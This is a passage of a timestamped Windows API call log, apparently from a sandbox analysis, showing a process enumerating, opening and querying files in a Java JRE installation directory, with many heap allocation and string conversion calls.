Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0093.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.833] AreFileApisANSI () returned 1 [0093.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt", lpUsedDefaultChar=0x0) returned 57 [0093.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0093.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.833] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0093.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0093.833] AreFileApisANSI () returned 1 [0093.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0093.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0093.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 57 [0093.834] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0093.834] GetFileType (hFile=0x368) returned 0x1 [0093.834] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0093.834] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.835] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.835] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.835] CloseHandle (hObject=0x368) returned 1 [0093.835] AreFileApisANSI () returned 1 [0093.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0093.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0093.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 57 [0093.835] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0093.835] GetFileType (hFile=0x368) returned 0x1 [0093.835] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0093.835] CloseHandle (hObject=0x368) returned 1 [0093.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.837] AreFileApisANSI () returned 1 [0093.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0093.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69e30 [0093.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x69e30, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 57 [0093.837] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b1f9e6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b1f9e6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b1f9e6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x58f)) returned 1 [0093.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69e30 | out: hHeap=0x20000) returned 1 [0093.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0093.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0093.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.837] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x6dea0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x70, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="\\s", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓֏")) returned 0 [0093.837] FindClose (in: hFindFile=0x78510 | out: hFindFile=0x78510) returned 1 [0093.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0093.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0093.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0093.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0093.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0093.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0093.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0093.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0093.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0093.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0093.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0093.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0093.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0093.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0093.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0093.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0093.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0093.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0093.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0093.980] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.980] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.980] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.980] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0093.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.980] AreFileApisANSI () returned 1 [0093.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe", lpUsedDefaultChar=0x0) returned 54 [0093.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0093.980] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.980] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0093.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0093.980] AreFileApisANSI () returned 1 [0093.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0093.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76098 [0093.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x76098, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe") returned 54 [0093.980] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\servertool.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.981] GetFileType (hFile=0x360) returned 0x1 [0093.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0093.982] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.982] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.982] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.982] CloseHandle (hObject=0x360) returned 1 [0093.982] AreFileApisANSI () returned 1 [0093.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0093.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76098 [0093.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x76098, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe") returned 54 [0093.982] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\servertool.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.982] GetFileType (hFile=0x360) returned 0x1 [0093.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0093.983] CloseHandle (hObject=0x360) returned 1 [0093.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0093.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0093.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.984] AreFileApisANSI () returned 1 [0093.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0093.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75dc8 [0093.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe") returned 54 [0093.984] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\servertool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\servertool.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040)) returned 1 [0093.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0093.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0093.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0093.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0093.984] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.984] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.984] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x32040, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="splashscreen.dll", cAlternateFileName="SPLASH~1.DLL")) returned 1 [0093.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0093.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0093.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0093.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0093.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0093.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0093.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0093.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0093.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0093.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0093.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0093.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0093.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 